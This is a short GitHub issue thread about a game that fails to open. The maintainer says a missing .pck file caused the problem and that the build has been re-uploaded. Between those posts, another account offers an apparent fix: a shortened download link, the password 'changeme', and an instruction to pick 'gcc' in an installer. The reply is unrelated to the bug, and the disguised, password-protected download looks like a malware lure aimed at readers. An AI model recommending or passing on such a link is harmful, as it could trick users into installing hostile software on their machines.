### ISSUE TITLE
Unable to open game

### ISSUE THREAD

**Issue by Azura974** [AWKFLO974/PixMaze-Escape#1]
I can't open the game.
![image](https://github.com/user-attachments/assets/42cedc80-cc0c-4912-bd31-52a0aa2f3fe6)

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by AWKFLO974** [comment]
I remove the version and upload again the new one.
file with pck extension missing
